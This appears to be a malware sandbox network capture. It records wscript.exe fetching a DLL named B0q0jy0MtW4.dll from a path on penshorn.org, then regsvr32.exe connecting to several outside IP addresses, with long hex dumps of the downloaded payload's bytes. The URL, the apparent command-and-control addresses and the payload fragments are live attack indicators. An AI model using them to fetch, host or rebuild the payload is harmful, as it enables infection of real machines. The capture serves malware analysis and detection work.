                                                                                                                                                                                                          Mar 17, 2023 09:26:40.878801107 CET44349729103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:41.164035082 CET44349729103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:46.495404005 CET497308080192.168.2.491.207.28.33
                                                                                                                                                                                                          Mar 17, 2023 09:26:49.505059004 CET497308080192.168.2.491.207.28.33
                                                                                                                                                                                                          Mar 17, 2023 09:26:55.521147966 CET497308080192.168.2.491.207.28.33
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.747709990 CET49731443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.747811079 CET44349731213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.747980118 CET49731443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.750829935 CET49731443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.750864983 CET44349731213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.774331093 CET44349731213.239.212.5192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.777400970 CET49732443192.168.2.4213.239.212.5
                                                                                                                                                                                                          Mar 17, 2023 09:27:05.777460098 CET44349732213.239.212.5192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 17, 2023 09:23:16.032634974 CET | 59683 | 53 | 192.168.2.4 | 8.8.8.8
Mar 17, 2023 09:23:16.332808971 CET | 53 | 59683 | 8.8.8.8 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 17, 2023 09:23:16.032634974 CET | 192.168.2.4 | 8.8.8.8 | 0xc31e | Standard query (0) | penshorn.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 17, 2023 09:23:16.332808971 CET | 8.8.8.8 | 192.168.2.4 | 0xc31e | No error (0) | penshorn.org | | 203.26.41.131 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                          • penshorn.org
                                                                                                                                                                                                          • 182.162.143.56
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49696 | 203.26.41.131 | 443 | C:\Windows\SysWOW64\wscript.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49700 | 182.162.143.56 | 443 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49701 | 187.63.160.88 | 80 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49696 | 203.26.41.131 | 443 | C:\Windows\SysWOW64\wscript.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-17 08:23:17 UTC | 0 | OUT | GET /admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org
2023-03-17 08:23:17 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Fri, 17 Mar 2023 08:23:17 GMT
Server: Apache
X-Powered-By: PHP/7.0.33
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 17 Mar 2023 08:23:17 GMT
Content-Disposition: attachment; filename="B0q0jy0MtW4.dll"
Content-Transfer-Encoding: binary
Set-Cookie: 641423754fac3=1679041397; expires=Fri, 17-Mar-2023 08:24:17 GMT; Max-Age=60; path=/
Last-Modified: Fri, 17 Mar 2023 08:23:17 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC72INData Raw: c0 75 06 ff 15 b5 34 00 00 33 d2 33 c9 ff 15 d3 36 00 00 85 c0 75 06 ff 15 a1 34 00 00 33 d2 33 c9 ff 15 bf 36 00 00 85 c0 75 06 ff 15 8d 34 00 00 33 d2 33 c9 ff 15 ab 36 00 00 85 c0 75 06 ff 15 79 34 00 00 33 d2 33 c9 ff 15 97 36 00 00 85 c0 75 06 ff 15 65 34 00 00 33 d2 33 c9 ff 15 83 36 00 00 85 c0 75 06 ff 15 51 34 00 00 33 d2 33 c9 ff 15 6f 36 00 00 85 c0 75 06 ff 15 3d 34 00 00 33 d2 33 c9 ff 15 5b 36 00 00 85 c0 75 06 ff 15 29 34 00 00 33 d2 33 c9 ff 15 47 36 00 00 85 c0 75 06 ff 15 15 34 00 00 33 d2 33 c9 ff 15 33 36 00 00 85 c0 75 06 ff 15 01 34 00 00 33 d2 33 c9 ff 15 1f 36 00 00 85 c0 75 06 ff 15 ed 33 00 00 33 d2 33 c9 ff 15 0b 36 00 00 85 c0 75 06 ff 15 d9 33 00 00 33 d2 33 c9 ff 15 f7 35 00 00 85 c0 75 06 ff 15 c5 33 00 00 33 d2 33 c9 ff 15
                                                                                                                                                                                                          Data Ascii: u4336u4336u4336uy4336ue4336uQ433o6u=433[6u)433G6u43336u4336u3336u3335u333
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC80INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC80INData Raw: 34 30 30 30 0d 0a 48 8b 44 24 20 0f be 00 85 c0 74 58 8b 04 24 c1 e8 0d 8b 0c 24 c1 e1 13 0b c1 89 04 24 48 8b 44 24 20 0f be 00 83 f8 61 7c 11 48 8b 44 24 20 0f be 00 83 e8 20 89 44 24 04 eb 0c 48 8b 44 24 20 0f be 00 89 44 24 04 8b 44 24 04 8b 0c 24 03 c8 8b c1 89 04 24 48 8b 44 24 20 48 ff c0 48 89 44 24 20 eb 9c 8b 05 0e e1 00 00 8b 0c 24 03 c8 8b c1 89 04 24 8b 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 58 41 b9 64 00 00 00 4c 8d 05 cb e0 00 00 ba 67 00 00 00 48 8b 4c 24 60 ff 15 13 16 00 00 41 b9 64 00 00 00 4c 8d 05 de df 00 00 ba 6d 00 00 00 48 8b 4c 24 60 ff 15 f6 15 00 00 48 8b 4c 24 60 e8 e4 bc ff ff 8b 54 24 78 48 8b 4c 24 60 e8 16 bc ff
                                                                                                                                                                                                          Data Ascii: 4000HD$ tX$$$HD$ a|HD$ D$HD$ D$D$$$HD$ HHD$ $$$HDL$ LD$HT$HL$HXAdLgHL$`AdLmHL$`HL$`T$xHL$`
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC88INData Raw: 00 00 00 00 40 3e 00 00 00 00 00 00 20 3f 18 2d 44 54 fb 21 e9 3f 00 00 00 00 80 84 1e 41 00 00 00 00 d0 12 73 41 ff ff ff ff ff ff ff 7f 00 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 41 00 00 00 00 00 00 f0 bf 05 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b4 02 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b5 02 00 c0 08 00 00 00 00
                                                                                                                                                                                                          Data Ascii: @> ?-DT!?AsAA
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC96INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC96INData Raw: 34 30 30 30 0d 0a 03 04 00 00 00 00 00 00 30 a2 01 80 01 00 00 00 04 04 00 00 00 00 00 00 88 7e 01 80 01 00 00 00 05 04 00 00 00 00 00 00 40 a2 01 80 01 00 00 00 06 04 00 00 00 00 00 00 50 a2 01 80 01 00 00 00 07 04 00 00 00 00 00 00 60 a2 01 80 01 00 00 00 08 04 00 00 00 00 00 00 70 a2 01 80 01 00 00 00 09 04 00 00 00 00 00 00 f0 8a 01 80 01 00 00 00 0b 04 00 00 00 00 00 00 80 a2 01 80 01 00 00 00 0c 04 00 00 00 00 00 00 90 a2 01 80 01 00 00 00 0d 04 00 00 00 00 00 00 a0 a2 01 80 01 00 00 00 0e 04 00 00 00 00 00 00 b0 a2 01 80 01 00 00 00 0f 04 00 00 00 00 00 00 c0 a2 01 80 01 00 00 00 10 04 00 00 00 00 00 00 d0 a2 01 80 01 00 00 00 11 04 00 00 00 00 00 00 58 7e 01 80 01 00 00 00 12 04 00 00 00 00 00 00 78 7e 01 80 01 00 00 00 13 04 00 00 00 00 00 00 e0
                                                                                                                                                                                                          Data Ascii: 40000~@P`pX~x~
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC104INData Raw: 00 00 00 00 00 00 68 c1 01 80 01 00 00 00 56 00 00 00 00 00 00 00 a0 a0 01 80 01 00 00 00 15 00 00 00 00 00 00 00 78 c1 01 80 01 00 00 00 57 00 00 00 00 00 00 00 88 c1 01 80 01 00 00 00 98 00 00 00 00 00 00 00 98 c1 01 80 01 00 00 00 8c 00 00 00 00 00 00 00 a8 c1 01 80 01 00 00 00 9f 00 00 00 00 00 00 00 b8 c1 01 80 01 00 00 00 a8 00 00 00 00 00 00 00 a8 a0 01 80 01 00 00 00 16 00 00 00 00 00 00 00 c8 c1 01 80 01 00 00 00 58 00 00 00 00 00 00 00 b0 a0 01 80 01 00 00 00 17 00 00 00 00 00 00 00 d8 c1 01 80 01 00 00 00 59 00 00 00 00 00 00 00 d8 a1 01 80 01 00 00 00 3c 00 00 00 00 00 00 00 e8 c1 01 80 01 00 00 00 85 00 00 00 00 00 00 00 f8 c1 01 80 01 00 00 00 a7 00 00 00 00 00 00 00 08 c2 01 80 01 00 00 00 76 00 00 00 00 00 00 00 18 c2 01 80 01 00 00 00 9c
                                                                                                                                                                                                          Data Ascii: hVxWXY<v
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC112INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC112INData Raw: 34 30 30 30 0d 0a b8 a6 4e fd 69 9c 3b 3e ab a4 5f 83 a5 6a 2b 3e d1 ed 0f 79 c3 cc 43 3e e0 4f 40 c4 4c c0 29 3e 9d d8 75 7a 4b 73 40 3e 12 16 e0 c4 04 44 1b 3e 94 48 ce c2 65 c5 40 3e cd 35 d9 41 14 c7 33 3e 4e 3b 6b 55 92 a4 72 3d 43 dc 41 03 09 fa 20 3e f4 d9 e3 09 70 8f 2e 3e 45 8a 04 8b f6 1b 4b 3e 56 a9 fa df 52 ee 3e 3e bd 65 e4 00 09 6b 45 3e 66 76 77 f5 9e 92 4d 3e 60 e2 37 86 a2 6e 48 3e f0 a2 0c f1 af 65 46 3e 74 ec 48 af fd 11 2f 3e c7 d1 a4 86 1b be 4c 3e 65 76 a8 fe 5b b0 25 3e 1d 4a 1a 0a c2 ce 41 3e 9f 9b 40 0a 5f cd 41 3e 70 50 26 c8 56 36 45 3e 60 22 28 35 d8 7e 37 3e d2 b9 40 30 bc 17 24 3e f2 ef 79 7b ef 8e 40 3e e9 57 dc 39 6f c7 4d 3e 57 f4 0c a7 93 04 4c 3e 0c a6 a5 ce d6 83 4a 3e ba 57 c5 0d 70 d6 30 3e 0a bd e8 12 6c c9 44 3e 15
                                                                                                                                                                                                          Data Ascii: 4000Ni;>_j+>yC>O@L)>uzKs@>D>He@>5A3>N;kUr=CA >p.>EK>VR>>ekE>fvwM>`7nH>eF>tH/>L>ev[%>JA>@_A>pP&V6E>`"(5~7>@0$>y{@>W9oM>WL>J>Wp0>lD>
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC120INData Raw: 00 00 01 00 00 00 91 de 00 00 ce de 00 00 6a 53 01 00 00 00 00 00 19 33 0b 00 25 34 22 00 19 01 1a 00 0e f0 0c e0 0a d0 08 c0 06 70 05 60 04 50 00 00 d0 f8 00 00 a8 c4 01 00 cb 00 00 00 94 d7 00 00 ff ff ff ff 19 2d 09 00 1b 54 90 02 1b 34 8e 02 1b 01 8a 02 0e e0 0c 70 0b 60 00 00 18 f7 00 00 40 14 00 00 19 31 0b 00 1f 54 96 02 1f 34 94 02 1f 01 8e 02 12 f0 10 e0 0e c0 0c 70 0b 60 00 00 18 f7 00 00 60 14 00 00 11 0a 04 00 0a 34 09 00 0a 52 06 70 84 2a 00 00 01 00 00 00 02 e2 00 00 81 e2 00 00 81 53 01 00 00 00 00 00 01 17 0a 00 17 54 0e 00 17 34 0d 00 17 52 13 f0 11 e0 0f d0 0d c0 0b 70 01 0e 02 00 0e 32 0a 30 01 18 06 00 18 54 07 00 18 34 06 00 18 32 14 60 01 04 01 00 04 02 00 00 01 09 01 00 09 42 00 00 01 10 06 00 10 64 09 00 10 34 08 00 10 52 0c 70 11
                                                                                                                                                                                                          Data Ascii: jS3%4"p`P-T4p`@1T4p``4Rp*ST4Rp20T42`Bd4Rp
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC128INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC128INData Raw: 34 30 30 30 0d 0a 66 40 00 00 7c ec 01 00 68 40 00 00 ee 40 00 00 54 eb 01 00 f0 40 00 00 7a 42 00 00 30 ec 01 00 7c 42 00 00 12 43 00 00 14 ea 01 00 14 43 00 00 01 44 00 00 b8 ec 01 00 04 44 00 00 8c 44 00 00 14 ea 01 00 bc 44 00 00 02 45 00 00 e4 e9 01 00 04 45 00 00 3b 45 00 00 e4 e9 01 00 50 45 00 00 68 45 00 00 c8 ed 01 00 70 45 00 00 71 45 00 00 cc ed 01 00 80 45 00 00 81 45 00 00 d0 ed 01 00 bc 45 00 00 0a 47 00 00 d4 ed 01 00 0c 47 00 00 51 47 00 00 e4 e9 01 00 54 47 00 00 9a 47 00 00 e4 e9 01 00 9c 47 00 00 e2 47 00 00 e4 e9 01 00 e4 47 00 00 35 48 00 00 54 eb 01 00 38 48 00 00 99 48 00 00 f0 ea 01 00 b0 48 00 00 f0 48 00 00 f0 ed 01 00 00 49 00 00 2a 49 00 00 f8 ed 01 00 30 49 00 00 56 49 00 00 00 ee 01 00 60 49 00 00 a7 49 00 00 08 ee 01 00 a8
                                                                                                                                                                                                          Data Ascii: 4000f@|h@@T@zB0|BCCDDDDEE;EPEhEpEqEEEEGGQGTGGGGG5HT8HHHHI*I0IVI`II
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC136INData Raw: e6 9b ca bb 3e 59 4f b6 31 2c 34 0c 05 c5 b4 6e 0e eb 04 78 f2 31 0e c3 ad 59 3c e3 75 5e dc 4e b4 89 d2 60 e2 4d 1e e5 40 05 5d 43 03 e0 cf 16 57 e2 20 26 f8 6e 0e 24 c1 43 35 1f 34 07 42 d0 79 17 b1 64 2e ed da b7 cc e3 1e 7f f2 d8 36 97 d8 63 3a be 01 14 ef 2e 1a 92 23 2b 71 e3 0c 3c c2 e3 89 e7 fd 3c 43 6f f1 44 2e 4b b5 3d 4c 44 3f 24 d3 ef 70 05 da 63 42 f0 01 2c 5f cc 65 39 54 6e 0e 29 c8 06 4a f5 04 07 92 1a a9 38 bb 64 2e cb 71 77 f4 27 14 5d ec 64 35 fb 16 59 3e cb 44 53 43 2e 1a 02 b6 6e 0e e3 34 3c 04 1a f5 d9 b7 1c 43 e1 75 16 96 07 4b 13 6a 62 6b b8 44 2d a7 5e d2 53 3a ff ef 3b 78 e0 28 46 c8 ca 5a a8 90 aa 36 be b0 91 3f d0 71 17 f1 44 2e 44 b5 3d 4c 45 74 b8 a6 ef 70 05 da 63 6a f0 01 2c 29 c8 65 39 be 5e 0e 40 e2 68 c3 f5 04 07 72 60 ac
                                                                                                                                                                                                          Data Ascii: >YO1,4nx1Y<u^N`M@]CW &n$C54Byd.6c:.#+q<<CoD.K=LD?$pcB,_e9Tn)J8d.qw']d5Y>DSC.n4<CuKjbkD-^S:;x(FZ6?qD.D=LEtpcj,)e9^@hr`
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC144INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC144INData Raw: 34 30 30 30 0d 0a cf 4a 14 52 1e c1 76 72 ea 75 71 1b 3a bf c4 ad 00 27 cd 16 38 23 e6 fd 1f 76 b2 ae 01 10 7d f7 9d 48 fb 1d 18 48 d3 4d 51 42 f3 0c 17 46 4d e1 61 64 f2 3e 77 0e 84 48 44 53 ef 2f 41 71 c7 3d 71 62 f9 0a 81 b6 97 30 b7 80 fd 0c 14 69 5a c3 40 6c 7b a5 72 58 b6 ef 61 5e 1b d1 a7 f6 ae 55 a1 3f 41 71 85 6b 71 62 41 82 51 50 39 7b bd 2d 18 20 de f8 02 5a f3 0c 17 22 c5 58 61 64 b4 0e 77 66 d2 ab 03 3c e9 0f 41 79 38 aa 35 46 01 e9 46 8b 8e b9 58 7d 7c 6f b1 55 75 02 92 1c f3 92 e0 44 45 24 be 3e 77 6e ad 10 37 52 28 e0 2e 11 77 a0 a1 eb 09 6b be 3f 79 f1 74 75 b7 23 3c a8 19 72 f3 0c 17 22 99 64 61 64 b4 3e 77 66 10 d5 44 53 a9 1f 41 79 9e 86 7b 62 ca 0f 11 34 99 7d 1a 5b 3c 20 b9 23 19 c9 31 f3 4d 60 6b 0f 71 64 c6 75 2c 64 4d 38 54 1b 30
                                                                                                                                                                                                          Data Ascii: 4000JRvruq:'8#v}HHMQBFMad>wHDS/Aq=qb0iZ@l{rXa^U?AqkqbAQP9{- Z"Xadwf<Ay85FFX}|oUuDE$>wn7R(.wk?ytu#<r"dad>wfDSAy{b4}[< #1M`kqdu,dM8T0
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC152INData Raw: 61 47 0c da 74 4f 55 71 b6 6f 55 4a 09 ce b0 e4 72 78 3c 11 b5 2c 14 01 b9 23 bc 48 33 a5 ee d8 66 64 35 9c 41 26 45 bc c9 8b 2f 6b 65 81 b6 a3 f9 ea 0d c8 fe 83 90 b9 d6 5f b5 fd e8 26 51 42 b5 cd eb 65 6b 00 58 9d 35 7a d2 a3 9d 30 44 53 17 a5 65 39 be 9e a9 65 41 43 21 91 72 78 fb 1d 18 38 84 4d 51 42 b5 3c 17 32 86 6e b7 ff b4 0e 77 76 e3 61 9f c8 ef ee 8d 3e 3f 2b 2c 87 41 43 b4 f1 99 7f 3c 59 73 2c cf de 90 e7 dc 4f 33 62 64 81 d4 8c 32 7a 53 ad 0b ed 50 94 ad 8b 62 39 3f b3 b1 62 41 c2 80 94 76 78 3c dc da bb b5 a0 d4 a2 33 48 33 a8 02 00 61 e5 80 9a 54 26 45 64 3d 8d ad e0 e0 d9 38 2b 71 26 ca c6 dd 73 71 78 b7 0d 18 38 bb ac 89 45 34 48 ba 26 4f 20 89 3b 03 7a 53 9e 52 77 44 53 c1 0d 98 c6 c0 ec f4 ba 46 43 35 74 b1 78 3c e1 35 a3 0d ac da cf ec
                                                                                                                                                                                                          Data Ascii: aGtOUqoUJrx<,#H3fd5A&E/ke_&QBekX5z0DSe9eAC!rx8MQB<2nwva>?+,AC<Ys,O3bd2zSPb9?bAvx<3H3aT&Ed=8+q&sqx8E4H&O ;zSRwDSFC5tx<5
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC160INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC160INData Raw: 34 30 30 30 0d 0a 57 46 1f 04 0a 20 11 0e 17 af 01 13 30 eb 0d 22 f7 1d be 5f 55 16 59 9f cb be b6 3c 18 29 f2 99 30 21 da 0e 10 38 c4 83 40 ca b0 8d 36 b0 92 cf 47 be 08 77 58 ea 29 1d 4f 44 04 4c c9 c2 41 50 01 16 a8 70 b4 af 75 49 89 d8 34 48 f2 0f 03 02 e0 11 5d 16 1b c3 28 b6 01 3b 4f d2 9a c6 be 5e 19 cc 39 a8 58 b3 34 18 e3 92 3c 68 f1 44 31 4b f5 25 53 68 00 45 01 3b bc 3f 33 e7 20 57 40 d2 5d 0b 85 5e 6f 29 fa 27 21 07 be 31 19 f3 68 7d 4c e3 7c 05 25 cb 70 6c 13 8a f5 16 61 64 f2 3f 3b 55 20 37 44 eb 2d 2a 75 3d b4 66 19 2e ca 8c c2 95 5a b2 ed b0 3f a2 f1 c8 57 cb 79 20 f2 0f 03 09 a0 01 5d 7e 92 43 2d 35 c5 26 40 6e 20 39 3f ec 34 02 20 b0 35 74 1a 3d 5c 14 b5 2d 50 a0 24 22 cd e5 2f 2c ea 45 01 8c bd 85 ac a7 00 57 8e 73 d7 94 e4 4c 5f 3f 93
                                                                                                                                                                                                          Data Ascii: 4000WF 0"_UY<)0!8@6GwX)ODLAPpuI4H](;O^9X4<hD1K%ShE;?3 W@]^o)'!1h}L|%plad?;U 7D-*u=f.Z?Wy ]~C-5&@n 9?4 5t=\-P$"/,EWsL_?
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC168INData Raw: 92 d8 14 e1 a0 8b 42 89 f4 9d 74 f1 70 7d 0c e9 7c 05 61 2d 95 2e 8f e3 1f 24 51 49 c7 10 ef ad 01 13 74 da 6c 4f 55 b2 73 0f 39 e9 45 67 06 bc 30 f1 75 5d fb 2c 14 11 08 43 34 48 f2 06 4f 30 62 e5 71 5e 63 db d5 37 44 d2 5c 4f 55 be e3 27 71 e9 05 67 05 fd 35 5c 0c 11 bf ac 18 e2 d8 16 10 58 ba 2e 4f 08 34 2c be 96 1b a5 a9 47 83 16 f0 de ac 39 3f 18 b1 2a c8 06 e9 fd 34 9c fb 1c 24 38 45 21 51 c3 71 50 e2 0f 6b 00 ea 21 2d f7 5f 66 46 fe cd 1e 30 00 20 21 64 a2 34 7a c0 06 2d 1b d9 78 3c d8 49 70 44 5e 2b a4 bf 0d 2b eb 2e ec a6 21 2d ae 40 26 45 f6 29 4b 24 ea 20 21 15 81 8e 9d c0 06 2d 54 6e 87 c3 d2 79 70 bd 2d 11 83 d5 4b ba 2f 73 81 14 7c 92 d2 09 55 ce 72 5c da 6d 93 a2 7c 27 26 10 62 41 c2 40 6c eb 3d 56 4d b7 25 28 99 1e ae f0 06 c4 83 aa ea 62
                                                                                                                                                                                                          Data Ascii: Btp}|a-.$QItlOUs9Eg0u],C4HO0bq^c7D\OU'qg5\X.O4,G9?*4$8E!QqPk!-_fF0 !d4z-x<IpD^++.!-@&E)K$ !-Tnyp-K/s|Ur\m|'&bA@l=VM%(b
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC176INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC176INData Raw: 34 30 30 30 0d 0a 70 8e 94 63 5d 32 2d 53 28 e0 28 21 7e a0 b1 95 a0 fb aa 66 95 51 fd b3 3e e1 65 39 da 0f 2c bf d2 49 a1 41 ea a4 e4 93 50 ec 84 de 42 da 65 73 e4 4c 27 44 6d 1c e0 82 50 6c 7c f9 49 41 70 09 8e 39 da 0f 2c c1 7e ba ac 45 79 c3 3c 7a 53 ad 08 2f b3 b2 f9 81 ec 6c 27 aa 04 7a 62 8e b4 68 f0 0d 24 20 76 c1 fa aa 14 5a bd 0d d3 a5 2e 18 f4 4c 35 7a 92 43 5d 32 2f 16 30 02 ec 7c 27 aa 3c 7a 3d a3 71 c7 f0 3d 24 40 ff 68 30 a0 24 5a b0 74 ba b7 e0 45 79 ed 70 9e 94 63 5d 35 d7 53 28 ea 28 21 e5 94 c6 9f c0 06 2d 18 7d 87 c3 d8 79 70 af 14 ae bd b5 3d 2b e7 fd a6 47 ef 70 62 da 63 99 f0 01 83 28 6a 65 39 fe 46 a1 69 c0 06 e5 f9 6c 78 3c d8 49 b8 b1 3c 51 42 f3 0d 2b f5 44 00 61 e5 78 62 2a 3a 1f ac 2f 16 30 45 ec 7c 27 aa 34 7a 61 04 ca 8b b0
                                                                                                                                                                                                          Data Ascii: 4000pc]2-S((!~fQ>e9,IAPBesL'DmPl|IAp9,~Ey<zS/l'zbh$ vZ.L5zC]2/0|'<z=q=$@h0$ZtEypc]5S((!-}yp=+Gpbc(je9Filx<I<QB+Daxb*:/0E|'4za
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC184INData Raw: a0 fb e8 33 01 67 fd b3 3f e1 a5 99 52 42 34 c3 be da 68 00 61 93 d4 51 99 9e 08 a6 8b e9 f9 82 66 f3 fe c2 74 eb cc fb 36 74 71 f9 b9 e1 3f 68 30 45 4c 42 34 c9 86 da 68 00 61 35 b1 79 53 e1 c0 87 47 53 28 21 c1 39 3f aa c4 d2 42 43 35 25 b1 47 e9 d2 b1 d8 33 21 51 b5 d5 63 f9 b3 82 03 ab a5 dc 7c da ab f5 34 44 53 a9 de d5 3a 3f 2b 3f 9c aa 41 71 ff fc c8 3f 59 3c e3 a5 99 52 42 34 c3 be a2 68 00 61 8c c7 3f ac d9 ce ff cf d6 e0 68 65 39 14 e3 17 e1 3d 0f 55 28 04 7d 5a d0 48 24 50 e6 d4 82 37 48 33 85 85 00 61 28 b8 3e 77 46 c4 82 84 50 28 6b 89 05 38 32 f0 e7 81 40 35 74 55 dd c3 a6 bd dd f0 22 51 42 95 eb 34 7b ac 85 d1 67 35 7a e6 a9 45 37 2f d6 98 68 65 39 60 a2 f4 d2 42 43 35 f5 f4 c8 3f 59 3c 4e 87 21 51 c3 81 f8 30 62 6b 71 3a 4e e9 f1 de 96 46
                                                                                                                                                                                                          Data Ascii: 3g?RB4haQft6tq?h0ELB4ha5ySGS(!9?BC5%G3!Qc|4DS:?+?Aq?Y<RB4ha?he9=U(}ZH$P7H3a(>wFP(k82@5tU"QB4{g5zE7/he9`BC5?Y<N!Q0bkq:NF
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC192INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC192INData Raw: 34 30 30 30 0d 0a fe 78 e2 ba 8c 3a f5 ea 98 64 c8 0e 42 f5 04 0f df 3e d9 81 bb 64 26 cb 71 5f f4 27 1c 76 0f 64 35 c2 f6 67 5f 93 cf 1e 5f 9c 84 12 f5 fa 98 61 8b 82 dc 71 f8 35 4b d8 49 1f e1 42 a8 da bf 0d 44 eb 2e 2b a6 21 42 d0 07 26 45 f6 29 24 25 ea 28 4e ca b4 85 8c c0 36 42 ea a5 58 c6 d2 79 1f b9 64 62 85 71 3f fd 45 6b 00 20 ef f4 f1 1e 51 b2 d6 85 b9 2c e2 30 4e be 5e 06 5c 7f 03 dd ff 34 0f b5 1c 3f af 75 56 fc ae 34 48 b2 27 1c 26 a4 9b ca bb 3e 51 46 f6 29 24 2c ea 10 4e 46 6b 4c 74 ca 06 42 fd 34 6b fb 1c 4b 80 ff 21 51 03 bf 89 b8 2f 1c f7 80 a5 df 7e da 73 32 5c 01 24 5c e2 20 4e be 6e 06 50 01 bc ca f5 04 0f 7a 29 a5 f6 bb 64 26 cb 71 4f f4 27 1c bf 34 64 35 3b d8 e7 c4 42 33 32 9e d4 cb b8 4a 5c 34 3e ab 8e b4 31 06 e9 90 59 3c e9 45
                                                                                                                                                                                                          Data Ascii: 4000x:dB>d&q_'vd5g__aq5KIBD.+!B&E)$%(N6BXydbq?Ek Q,0N^\4?uV4H'&>QF)$,NFkLtB4kK!Q/~s2\$\ NnPz)d&qO'4d5;B32J\4>1Y<E
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC200INData Raw: 3c 56 b8 c1 34 21 51 7f 40 08 33 62 64 84 21 66 35 7a 6e 5f ad 37 44 5c ac 40 67 39 3f 16 83 8d 41 43 3a f1 0d 7c 3c 59 fb 2d 33 a6 97 42 34 23 76 61 40 89 24 67 8d 73 98 1b c8 b6 01 50 96 87 9a c6 be 6e 72 f2 d1 bc ca f5 34 7b bf b3 3c 68 b1 54 52 3c f4 69 33 a5 2e ff 99 25 35 7a d2 63 ba c1 b7 53 28 aa 00 c6 36 aa 34 9d 25 7c 35 74 f0 3d c3 23 66 97 cf a0 24 bd ea 3d 58 60 ac 45 6a 18 c1 7a 53 ad 08 3c b3 b2 e9 81 60 b0 6a 20 f0 17 4a 1a 31 d5 e5 f9 49 52 53 68 91 b5 96 07 3b cd 03 62 6b 8b 24 6b b8 76 d3 af 08 38 c5 26 27 31 8b 38 3f ec 34 99 18 53 35 74 f0 3d c7 9b 83 68 30 a0 1c b9 cb 3f ac ad aa 65 9a 60 b4 0f a8 d4 cb c0 bd 94 6d 78 14 77 3f 2b f0 2f 52 df db 13 76 f9 49 4a 49 35 57 26 96 07 c3 eb 6b 62 6b 6b 24 93 7f f3 16 d1 fd fe 06 45 9a e0 28
